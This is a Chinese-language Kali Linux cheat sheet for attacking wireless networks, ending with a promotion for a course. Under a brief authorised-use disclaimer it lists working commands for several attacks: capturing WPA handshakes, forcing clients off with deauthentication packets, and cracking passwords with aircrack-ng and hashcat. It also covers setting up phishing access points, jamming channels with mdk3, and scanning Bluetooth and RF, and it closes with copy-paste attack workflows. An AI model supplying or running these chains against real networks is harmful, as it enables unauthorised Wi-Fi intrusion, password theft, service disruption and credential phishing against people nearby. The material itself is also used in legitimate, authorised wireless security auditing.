【目录】
1. 合规使用声明
2. 基础无线网卡配置模块
3. 无线网络扫描模块
4. WPA/WPA2 破解测试模块
5. 无线监听与流量捕获模块
6. 伪AP/钓鱼AP 测试模块
7. 蓝牙/射频辅助测试模块
8. 实战组合流程(可直接复制)
---
1. 合规使用声明
本手册仅用于合法授权的无线安全检测、企业内网审计与教学研究。
严禁对非自有、未授权的Wi‑Fi、蓝牙、射频信号进行监听、拦截、破解、干扰或伪造接入点。
使用本手册内容违反所在国家/地区网络安全与无线电管理法规的,责任自负。
---
2. 基础无线网卡配置模块
2.1 查看无线网卡
- 命令:iw dev
- 作用:列出系统识别的无线网卡
- 示例:iw dev
2.2 查看网卡支持模式
- 命令:iw list | grep "monitor"
- 作用:检查网卡是否支持监听模式
- 示例:iw list | grep "monitor"
2.3 关闭网络管理
- 命令:nmcli radio wifi off
- 作用:关闭NetworkManager干扰
- 示例:nmcli radio wifi off
2.4 开启监听模式
- 命令:airmon-ng start wlan0
- 作用:将网卡切换为监听模式(生成 wlan0mon)
- 示例:airmon-ng start wlan0
2.5 关闭监听模式
- 命令:airmon-ng stop wlan0mon
- 作用:恢复普通网卡模式
- 示例:airmon-ng stop wlan0mon
---
3. 无线网络扫描模块
3.1 扫描附近Wi‑Fi(实时)
- 命令:airodump-ng wlan0mon
- 作用:扫描周围AP、信道、BSSID、客户端
- 示例:airodump-ng wlan0mon
3.2 按信道精准扫描
- 命令:airodump-ng -c 信道 --bssid MAC wlan0mon
- 作用:只监听指定AP
- 示例:airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon
3.3 轻量扫描
- 命令:iwlist scan
- 作用:系统自带Wi‑Fi扫描
- 示例:iwlist wlan0 scan
3.4 图形扫描
- 命令:kismet
- 作用:专业无线扫描与GIS定位
- 示例:直接运行 kismet
---
4. WPA/WPA2 破解测试模块
4.1 抓取握手包
- 命令:airodump-ng -c 信道 --bssid MAC -w 保存名 wlan0mon
- 作用:捕获WPA握手包
- 示例:airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
4.2 强制断开客户端获取握手
- 命令:aireplay-ng -0 2 -a AP_MAC -c 客户端MAC wlan0mon
- 作用:发送解除认证包
- 示例:aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
4.3 字典爆破握手包
- 命令:aircrack-ng -w 字典路径 捕获文件.cap
- 作用:WPA握手包密码破解
- 示例:aircrack-ng -w /usr/share/wordlists/rockyou.txt cap-01.cap
4.4 用hashcat加速破解
- 命令:hcxpcapngtool 捕获文件.cap output.hc22000
- 作用:转换为hashcat格式
- 示例:hcxpcapngtool cap-01.cap wifi.hc22000
- 命令:hashcat -m 22000 wifi.hc22000 字典.txt
- 作用:GPU高速破解
- 示例:hashcat -m 22000 wifi.hc22000 rockyou.txt
---
5. 无线监听与流量捕获模块
5.1 抓802.11包
- 命令:tcpdump -i wlan0mon -w wifi.pcap
- 作用:监听并保存无线原始流量
- 示例:tcpdump -i wlan0mon -w dump.pcap
5.2 实时查看包内容
- 命令:tshark -i wlan0mon
- 作用:命令行无线流量分析
- 示例:tshark -i wlan0mon
5.3 过滤EAPOL握手包
- 命令:tshark -i wlan0mon -Y eapol
- 作用:只显示WPA握手包
- 示例:tshark -i wlan0mon -Y eapol
---
6. 伪AP/钓鱼AP 测试模块
6.1 创建开放伪AP
- 命令:airbase-ng -e "测试AP" -c 6 wlan0mon
- 作用:创建无密码钓鱼AP
- 示例:airbase-ng -e "FreeWiFi" -c 6 wlan0mon
6.2 创建WPA2伪AP
- 命令:hostapd hostapd.conf
- 作用:创建高仿真加密AP
- 示例:配置文件指定SSID、密码、信道后启动
6.3 强制客户端连接伪AP
- 命令:mdk3 wlan0mon d -c 6
- 作用:信道干扰/踢人
- 示例:mdk3 wlan0mon d -c 6
---
7. 蓝牙/射频辅助测试模块
7.1 扫描蓝牙设备
- 命令:hcitool scan
- 作用:扫描附近蓝牙
- 示例:hcitool scan
7.2 蓝牙信息收集
- 命令:bluetoothctl
- 作用:蓝牙管理与扫描
- 示例:进入交互模式扫描
7.3 RF扫描
- 命令:rtl_power -f 2400M:2500M:1M log.csv
- 作用:2.4G频段能量扫描
- 示例:rtl_power -f 2400M:2500M:1M scan.csv
---
8. 实战组合流程(可直接复制)
流程1:标准WPA渗透(授权环境)
nmcli radio wifi off
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w target wlan0mon
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
aircrack-ng -w rockyou.txt target-01.cap
流程2:握手包转hashcat高速破解
hcxpcapngtool target-01.cap wifi.hc22000
hashcat -m 22000 wifi.hc22000 wordlist.txt
流程3:监听+流量分析
airmon-ng start wlan0
tcpdump -i wlan0mon -w wifi_traffic.pcap
tshark -r wifi_traffic.pcap -Y eapol
流程4:收尾恢复网卡
airmon-ng stop wlan0mon
nmcli radio wifi on
点击阅读原文,学习Kali与编程最全课